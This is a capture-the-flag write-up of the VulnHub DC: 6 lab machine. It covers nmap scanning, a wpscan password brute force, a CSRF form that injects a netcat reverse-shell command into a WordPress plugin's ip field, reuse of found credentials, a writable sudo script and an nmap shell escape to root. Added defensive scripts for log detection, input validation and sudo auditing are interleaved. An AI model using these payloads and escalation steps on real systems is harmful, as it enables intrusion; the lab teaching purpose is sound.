
[Information Security] VulnHub – DC: 6 Write-up

DC: 6 is the sixth box in the DC series. It is close to DC: 2, which I solved earlier: the environment is again WordPress and the password is cracked with the same technique. The only thing that took a long time was the password brute force, because I ignored the hint the author gave and ran it far longer than necessary, at one point even thinking my whole approach was wrong. The box is not especially difficult overall, but there was still something to learn from it.

Environment Setup

VirtualBox: Kali & DC: 6
Net Config: NAT Network

Finding the Target

$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 10:23 CST
Nmap scan report for 10.0.2.1
Host is up (0.040s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0017s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00020s latency).
Nmap scan report for 10.0.2.17
Host is up (0.0020s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.40 seconds

$ nmap 10.0.2.17 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 10:24 CST
Nmap scan report for 10.0.2.17
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.95 seconds

Walkthrough

As with DC: 2, the hostname has to be set manually: the nmap output shows a redirect to http://wordy/, so add the mapping to /etc/hosts and the target page becomes reachable.

sudo vim /etc/hosts
10.0.2.17      wordy

wpscan

It is again a WordPress site, so I enumerated it directly with wpscan, which found quite a few users and showed that xmlrpc is enabled.

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

The routine is the same as DC: 2: try brute-forcing every user. I also tried cewl to scrape the English words on the pages as a password list, without success, and with rockyou.txt I gave up after running roughly 10 minutes per user.

Out of leads and hitting walls, I stared at the page for several hours, until I went back to the VulnHub DC: 6 download page and found...

There is actually a CLUE section there. I had only cared about downloading the VM and never expected a hint to be hidden on that page. It confirms that the password is meant to be brute-forced.

Create User List File

cat << EOF > dc6_username_list.txt
admin
graham
mark
sarah
jens
EOF

Create Password List File

grep k01 /usr/share/wordlists/rockyou.txt > dc6_password_list.txt

Brute-Force to Login

The brute force yielded one credential pair, mark::helpdesk01, and the login succeeded.

$ ./wpscan --url http://wordy/ -U dc6_username_list.txt -P dc6_password_list.txt --max-threads 30
[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01                   
Trying sarah / $k011 Time: 00:07:14 <===================================================================               > (12550 / 15218) 82.46% 
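The same brute force is visible from the server side. As a defender's counterpart, added here and not part of the original write-up, the script below scans Apache access-log lines for bursts of POSTs to /xmlrpc.php from a single client; the log lines are constructed samples, and the window size and threshold are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# One Apache combined-log line, e.g.
# 10.0.2.15 - - [08/Feb/2021:10:40:01 +0800] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "WPScan"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def xmlrpc_bursts(lines, window_seconds=60, threshold=20):
    # {ip: peak count} for clients with more than `threshold` POSTs to
    # /xmlrpc.php inside any sliding window of `window_seconds`.
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].split("?")[0] == "/xmlrpc.php":
            per_ip[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged

# Constructed sample: a wpscan-style run of 30 XML-RPC logins in 30 s from one
# client, plus normal traffic (one legitimate xmlrpc POST) from another.
SAMPLE_LOG = [
    f'10.0.2.15 - - [08/Feb/2021:10:40:{i:02d} +0800] "POST /xmlrpc.php HTTP/1.1" '
    '200 370 "-" "WPScan v3.8.14"' for i in range(30)
] + [
    '10.0.2.1 - - [08/Feb/2021:10:40:05 +0800] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '10.0.2.1 - - [08/Feb/2021:10:40:09 +0800] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Jetpack"',
]

if __name__ == "__main__":
    print(xmlrpc_bursts(SAMPLE_LOG))  # {'10.0.2.15': 30}
```

If xmlrpc.php is not needed (Jetpack, mobile apps, pingbacks), the simpler mitigation is to disable it outright at the web server or in WordPress.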

Get Shell

After logging in, a quick look around showed that the plugin "Activity monitor" may contain an RCE vulnerability, and the PoC is not complicated.

PoC

cat << EOF >> dc6_am_poc.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="| nc -nlvp 10.0.2.15 8888 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
EOF
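The injected value lands in the plugin's `ip` parameter, which ends up on a shell command line. As an added example (not the plugin's code, which is PHP), here is the same lookup pattern in Python with the weak form beside a hardened one; `dig -x` as the lookup command and the function names are assumptions.

```python
import ipaddress
import subprocess

# The page's injected value, kept here only as the negative test case.
PAYLOAD = "| nc -nlvp 10.0.2.15 8888 -e /bin/bash"

def vulnerable_lookup_command(ip):
    # The weak pattern: the request parameter is pasted straight into a shell
    # command line, so "| nc ..." inside `ip` becomes a second command.
    return "dig -x " + ip

def is_valid_lookup_target(ip):
    # Parse instead of pattern-matching: ipaddress accepts exactly one address
    # and nothing else, so no shell metacharacter can survive validation.
    try:
        ipaddress.ip_address(ip.strip())
        return True
    except ValueError:
        return False

def safe_lookup_args(ip):
    # Hardened form: validate first, then build an argument list (no shell).
    if not is_valid_lookup_target(ip):
        raise ValueError("lookup target must be a single IPv4/IPv6 address")
    return ["dig", "-x", str(ipaddress.ip_address(ip.strip()))]

def reverse_lookup(ip):
    # A list plus shell=False runs dig with exactly these arguments; there is
    # no shell to interpret "|", ";" or "$()".
    return subprocess.run(safe_lookup_args(ip), capture_output=True,
                          text=True, timeout=10).stdout
```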

Listen

nc -nl -vv -p 8888

Victim

python -c "import pty;pty.spawn('/bin/bash')"

Get other user

Under /home/mark there is a stuff directory, and the things-to-do.txt inside it holds a set of credentials for graham, which can be used to log in over SSH.

www-data@dc-6:/home$ cd /home/mark
www-data@dc-6:/home/mark$ ls
stuff
www-data@dc-6:/home/mark$ file stuff
www-data@dc-6:/home/mark$ cd stuff
www-data@dc-6:/home/mark/stuff$ ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/home/mark/stuff$ 

Get Shell via SSH

After getting SSH access, sudo -l gives some useful information. The key line is (jens) NOPASSWD: /home/jens/backups.sh, which means backups.sh can be run as jens without entering a password.

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

Checking the content of /home/jens/backups.sh: it compresses everything under /var/www/html into backups.tar.gz.

#!/bin/bash
tar -czf backups.tar.gz /var/www/html

Privilege Escalation

Since backups.sh can be edited by graham, modifying it lets us run commands as jens. Change the script content to:

#!/bin/bash
sudo -l

Running it gives:

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

User jens can run nmap via sudo without a password. As for how to get a shell out of nmap, see GTFOBins, which collects the common ways of getting a shell from Linux binaries.

Rewrite backups.sh as follows:

#!/bin/bash
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

Running the script with sudo -u jens ./backups.sh gives root directly.

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh

Starting Nmap 7.40 ( https://nmap.org ) at 2021-02-08 21:09 AEST
NSE: Warning: Loading '/tmp/tmp.Gin4myBpdU' -- the recommended file extension is '.nse'.
# root
# # theflag.txt
# 

Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

# 
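What made the chain above work is a sudo rule whose target script is writable by the caller, followed by a sudo rule on a binary with a known shell escape. The audit script below is added here and is not part of the write-up: it parses `sudo -l` output and flags both conditions. The `sudo -l` text is the box's own, KNOWN_ESCAPES is a partial list, and the uid/gid values in the checks are constructed.

```python
import os
import re
import stat

KNOWN_ESCAPES = {"nmap", "vim", "find", "awk", "perl", "python", "less"}  # partial GTFOBins subset
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$')

def parse_sudo_l(text):
    # Rule lines of `sudo -l` -> [(run-as user, NOPASSWD?, binary path)].
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            for cmd in m.group("cmds").split(","):
                if cmd.split():
                    rules.append((m.group("runas").strip(), "NOPASSWD" in tags, cmd.split()[0]))
    return rules

def writable_by(mode, owner_uid, owner_gid, uid, gids):
    # POSIX: owner bits if you own it, else group bits if in the group, else other bits.
    if uid == 0:
        return True
    if uid == owner_uid:
        return bool(mode & stat.S_IWUSR)
    if owner_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)

def audit(text, uid, gids):
    # (run-as, path, reason) for every rule the calling user could abuse.
    findings = []
    for runas, _nopasswd, path in parse_sudo_l(text):
        if os.path.basename(path) in KNOWN_ESCAPES:
            findings.append((runas, path, "known shell escape"))
        try:
            st = os.stat(path)
        except OSError:
            findings.append((runas, path, "target missing, check parent dir"))
            continue
        if writable_by(st.st_mode, st.st_uid, st.st_gid, uid, gids):
            findings.append((runas, path, "writable by caller"))
    return findings

SUDO_L_GRAHAM = "User graham may run the following commands on dc-6:\n    (jens) NOPASSWD: /home/jens/backups.sh\n"
SUDO_L_JENS = "User jens may run the following commands on dc-6:\n    (root) NOPASSWD: /usr/bin/nmap\n"
```

Run `audit(open("sudo-l.txt").read(), os.getuid(), set(os.getgroups()))` on a saved `sudo -l` to check a real host; the fix for the first finding is to make sudo targets root-owned and not group- or world-writable, and for the second to avoid granting sudo on interpreters and binaries that can spawn a shell.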